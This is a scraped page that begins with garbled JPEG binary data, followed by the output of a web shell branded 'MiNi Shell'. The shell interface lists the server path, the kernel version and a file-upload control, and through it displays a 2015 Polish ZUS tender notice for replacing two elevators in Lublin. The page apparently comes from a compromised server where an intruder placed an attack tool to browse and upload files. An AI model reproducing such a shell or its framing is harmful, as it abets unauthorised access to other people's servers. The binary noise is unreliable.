JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150402/74788-N-2015.html

<p class="kh_header"><b>Lublin: Wymiana  2. dźwigów osobowych w budynku  przy ul. T. Zana 36A
w Oddziale ZUS w Lublinie</b><br>
<b>Numer ogłoszenia: 74788 - 2015; data zamieszczenia: 02.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Lublinie , ul. Tomasza Zana 36,38c, 20-601 Lublin, woj. lubelskie, tel. 081 5357402, faks 081 5357402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana  2. dźwigów osobowych w budynku  przy ul. T. Zana 36A
w Oddziale ZUS w Lublinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia stanowią  roboty  budowlane, polegające na wymianie 2 szt. dźwigów osobowych (900 kg/12 osób) w budynku O/ZUS w Lublinie przy ul. T. Zana 36A;

1.1. Zakres zamówienia obejmuje w szczególności: demontaż i utylizację istniejących dźwigów o napędzie hydraulicznym; wykonanie instalacji elektrycznej zasilania i sterowania dźwigami z napędem elektrycznym; dostawę i zamontowanie fabrycznie nowych, wyprodukowanych  w 2015 roku, 2 szt. dźwigów osobowych (900kg/12 osób) z kompletnym i niezbędnym osprzętem w szybie i w maszynowni; wykonanie wszystkich niezbędnych robót budowlanych   w szybie i maszynowni dźwigów, opracowanie kompletnej dokumentacji rejestracyjnej  i uzyskanie pozytywnej, bezwarunkowej decyzji o dopuszczeniu przez Urząd Dozoru Technicznego dźwigów do eksploatacji, uruchomienie i przekazanie Zamawiającemu dźwigów do eksploatacji; przeszkolenie osób wskazanych przez Zamawiającego w zakresie zapewniającym właściwą obsługę zamontowanych dźwigów, oraz utrzymywanie w stałej sprawności technicznej zamontowanych dźwigów w okresie gwarancji;

2.Prace wykonywane będą w czynnym obiekcie użyteczności publicznej i wykonawca będzie zobowiązany do etapowania wymiany dźwigów tak, aby umożliwić normalne funkcjonowanie budynku. Każdy etap robót powinien obejmować wymianę jednego dźwigu z uwzględnieniem czasu potrzebnego na jego odbiór przez UDT i dopuszczenie do eksploatacji (włącznie z jego rejestracją);
 
3.Termin realizacji zamówienia : 30 września 2015r.;  przy czym za dzień zakończenia realizacji przedmiotu zamówienia uważa się dzień podpisania przez Strony  bezusterkowego protokołu odbioru końcowego robót;

4. Dokładny  zakres i warunki realizacji przedmiotu zamówienia opisane są  w Specyfikacji Istotnych Warunków Zamówienia (SIWZ) a w szczególności  w   Specyfikacjach Wykonania i Odbioru Robót Budowlanych (STWiORB), opinii konstrukcyjno-budowlanej i przedmiarze robót, stanowiących  integralną część SIWZ;
 
 5.  Wykonawca wykona przedmiot zamówienia zgodnie  z SIWZ, złożoną ofertą,  oraz obowiązującymi przepisami Prawa budowlanego i  normami technicznymi;

6. WSPÓLNY SŁOWNIK ZAMÓWIEŃ: Kody CPV: 45-00-00-00-7 - Roboty budowlane, 45313400-5  - Instalowanie wind;

7.9.   Nie przewiduje się zamówień  uzupełniających, o których mowa w art. 67 ust.  1 pkt 6   i 7 lub art. 134 ust. 6 pkt 3 i 4 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych   ( Dz. U. z 2013 r. poz. 907 z późn. zm.),  zwanej dalej >ustawą<..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.34.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagane jest wniesienie wadium w kwocie: 10 800,00 zł (słownie: dziesięć tysięcy osiemset 00/100 zł).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa wymagań szczególnych w zakresie tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy wymaga aby wykonawca należycie  zrealizował,  w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej     2 zamówienia   polegające na  wykonaniu robót budowlanych, zawierających    w swoim zakresie dostawę i montaż dźwigu osobowego  z napędem elektrycznym   o wartości zamówienia minimum 140 000 zł. brutto każde zamówienie;

Na potwierdzenie spełniania tego warunku, wykonawca złoży wraz z ofertą:
 wykaz robót budowlanych (wg załącznika do SIWZ), wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, wraz z podaniem ich rodzaju  i wartości oraz daty i miejsca wykonywania oraz 	załączy dowody* dotyczące najważniejszych robót, określające, czy roboty te zostały wykonane    w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończone;  

	     Na podstawie § 1 ust. 4 Rozporządzenia PRM z dnia  19 lutego 2013r. w sprawie rodzaju dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane  (Dz. U. z 2013r. poz. 231), Zamawiający wymaga wskazania w ww. wykazie co najmniej dwóch robót  spełniających warunki opisane w pkt.I.2) i dołączenia dowodów dotyczących wskazanych  robót, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej    i prawidłowo ukończone.

    *  >dowodami< są poświadczenia lub inne dokumenty, jeżeli z uzasadnionych przyczyn  o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia.    W przypadku, gdy zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane  w wykazie , zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa wymagań szczególnych w zakresie tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy wymaga aby wykonawca dysponował osobami, które będą wykonywać zamówienie, posiadającymi  kwalifikacje uprawniające  do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku dozoru   (co najmniej jedna osoba) oraz na stanowisku eksploatacji  (co najmniej jedna osoba) a także dysponuje co najmniej jedną osobą zdolną do pełnienia funkcji kierownika robót budowlanych w specjalności konstrukcyjno-budowlanej; 

Na potwierdzenie spełniania tego warunku, wykonawca złoży wraz z ofertą:
wykaz osób (wg załącznika do SIWZ), które będą uczestniczyć w wykonywaniu zamówienia, wraz  z informacjami na temat ich kwalifikacji zawodowych,  niezbędnych do wykonania zamówienia, także zakresu wykonywanych przez  nie czynności, oraz informacją o podstawie do dysponowania tymi osobami a także oświadczenie, że osoby wymienione w wykazie posiadają wymagane uprawnienia.
Wykaz musi zawierać co najmniej jedną osobę (lub co najmniej po  jednej osobie) posiadającą świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci  na stanowisku dozoru - typu D  oraz  na stanowisku eksploatacji - typu E,  a także   co najmniej jedną osobą zdolną do pełnienia funkcji kierownika robót budowlanych  w specjalności konstrukcyjno-budowlanej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa wymagań szczególnych w zakresie tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Na podstawie § 1 ust. 4 Rozporządzenia PRM z dnia  19 lutego 2013r. w sprawie rodzaju dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane  (Dz. U. z 2013r. poz. 231), Zamawiający wymaga wskazania w ww. wykazie co najmniej dwóch robót  spełniających warunki opisane w pkt.I.2) i dołączenia dowodów dotyczących wskazanych  robót, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej    i prawidłowo ukończone.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli  w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.2 tiret 2 i 4, zastępuje się je  dokumentem  zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju  miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione  nie wcześniej niż 6 miesięcy (tiret 2)  lub 3 miesiące (tiret 4)  przed upływem terminu składania ofert;

2.  Jeżeli wykonawca nie spełnia samodzielnie warunków udziału w postępowaniu  a  wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach (wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach ekonomicznych i finansowych)  innych podmiotów na zasadach określonych w art. 26 ust.2b ustawy, zobowiązany jest udowodnić Zamawiającemu,  że będzie dysponował zasobami niezbędnymi do realizacji zamówienia przez cały okres jego realizacji, w szczególności załączając do oferty pisemne zobowiązanie tych podmiotów (oryginał)  do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia i na okres korzystania z nich przy wykonywaniu zamówienia.  Z treści zobowiązania lub innych dokumentów dołączonych do oferty ma wynikać m.in. zakres dostępnych wykonawcy zasobów innego podmiotów,  sposób wykorzystania zasobów innego podmiotu przy wykonywaniu zamówienia oraz zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia. Zamawiający tylko wówczas będzie mógł uznać zdolność wykonawcy do realizacji zamówienia, gdy wykonawca wykaże, poprzez treść przedstawionych dokumentów, realny sposób, w jaki jest przewidziane korzystanie z zasobów podmiotu trzeciego   w czasie realizacji zamówienia, a zatem realny sposób w jaki podmiot trzeci gwarantuje wykonawcy rzeczywisty dostęp do swojego potencjału w stopniu niezbędnym dla należytego wykonania zamówienia. 

        Podmiot trzeci, który zobowiązał się do udostępnienia wykonawcy swoich zasobów  w celu wykazania się przez wykonawcę zdolnością do realizacji zamówienia,   na podstawie art. 26  ust. 2b ustawy, będzie ponosił solidarną odpowiedzialność wraz z wykonawcą za szkodę zamawiającego powstałą na skutek nieudostępnienia zasobów. Podmiot trzeci nie będzie ponosił solidarnej odpowiedzialności tylko wówczas, gdy nieudostępnienie zasobów nie było przez niego zawinione np. gdy wykonawca realizował zamówienie przy udziale innych zasobów mimo gotowości udostępnienia ich przez podmiot trzeci.
            W przypadku polegania na zasobach innych podmiotów, spełnianie warunków  udziału w postępowaniu,  o których mowa  w pkt. III.3,   będzie oceniane łącznie (wykonawca i inny podmiot);

3.W przypadku oferty wspólnej (np. konsorcjum )
a/ spełnianie warunków  udziału w postępowaniu,  o których mowa   w  pkt.III.3,   będzie oceniane łącznie;
b/ oświadczenie, o którym mowa w pkt. III.4.1)  (z art. 22 ust.1 ustawy), składa każdy z wykonawców składających ofertę wspólną  lub pełnomocnik wykonawcy;   przy  czym  pełnomocnictwo powinno być dołączone do oferty; 

c/ brak podstaw do wykluczenia musi wykazać  każdy ze składających ofertę wspólną  poprzez  złożenie wraz z  ofertą dokumentów, o których mowa w pkt. III.4.2.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - okres gwarancji - 15</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>opisano w SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ w formie papierowej (bezpłatna) można odebrać  w siedzibie Zamawiającego, 20-601 Lublin,  ul. T. Zana 38C , piętro IX,  pokój   nr 902 - budynek  38C..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2015 godzina 12:00, miejsce: Oferty należy składać w siedzibie Zamawiającego, piętro IV, pok. Nr 406 - budynek  przy ul. T. Zana 38C.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. SIWZ  zamieszczona będzie na stronie internetowej  Zamawiającego: www.zus.pl od dnia zamieszczenia  ogłoszenia   w Biuletynie Zamówień Publicznych (ogłoszenie będzie opublikowane w dniu  02.04.2015r.  na portalu UZP)  do upływu terminu składania ofert;

2. SIWZ w formie papierowej (bezpłatna) można odebrać  osobiście   w siedzibie Zamawiającego, ZUS Oddział    w Lublinie, 20-601 Lublin,  ul. T. Zana 38C , piętro IX,  pokój   nr 902 - budynek  38C  lub otrzymać  pocztą;

3. Pracownikami  uprawnionymi  do kontaktów z wykonawcami  są:  Włodzimierz Koczkodaj  tel/fax: (81) 535-77-94 , e-mail: Wlodzimierz.Koczkodaj@zus.pl    oraz  Andrzej  Orzechowski   -   tel: (81) 535-77-24,   e-mail:  Andrzej.Orzechowski@zus.pl   w godz. 07:15 -15:15; 

4. Otwarcie ofert nastąpi w dniu  23.04.2015r.  o godzinie 12:30 w siedzibie   Zamawiającego, piętro IV,  sala nr 414 - budynek  przy ul T. Zana 36A; 

5. Kryteria oceny ofert i ich znaczenie - cena brutto oferty- 85%;  okres gwarancji  -  15%.

6. Termin związania ofertą - 30 dni od daty składania ofert -  bieg terminu związania  ofertą rozpoczyna się wraz z upływem terminu składania ofert; 

7. Ustanawianie dynamicznego systemu zakupów - nie dotyczy niniejszego zamówienia; 

8.  Zamawiający nie przewiduje udzielania zaliczek na poczet wykonania zamówienia, o których mowa   w art. 151a ustawy; 

9. Zamawiający nie przewiduje wymagań związanych z realizacją zamówienia (o których mowa w art. 29 ust. 4 ustawy), tj. dotyczących zatrudnienia osób bezrobotnych i młodocianych w celu przygotowania zawodowego, niepełnosprawnych i innych ,  o których mowa w przepisach o zatrudnieniu socjalnym lub we właściwych przepisach państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego.

10. Zamawiający nie przewiduje zawarcia umowy ramowej;

11. Na podstawie art. 27.1 ustawy Zamawiający ustala faksową (nr faksu: 81 535-77-94) lub  elektroniczną Wlodzimierz.Koczkodaj@zus.pl w postaci skanów  dokumentów podpisanych przez wykonawcę lub osobę uprawnioną  -  formę przekazywania informacji,  oświadczeń, wniosków, zawiadomień; przy czym każda ze stron, na żądanie drugiej, potwierdzi niezwłocznie fakt otrzymania korespondencji. Niezależnie od powyższego ustalenia zawsze dopuszczalna jest forma pisemna  ( w szczególności forma ta jest obowiązująca dla  oferty  i dokumentów składanych jako uzupełnienie oferty na wezwanie Zamawiającego) z zastrzeżeniem wyjątków przewidzianych w ustawie.  W zakresie  określonym ustawą, Zamawiający będzie zamieszczał  dokumenty i informacje dotyczące niniejszego postępowania  na stronie internetowej   www.zus.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com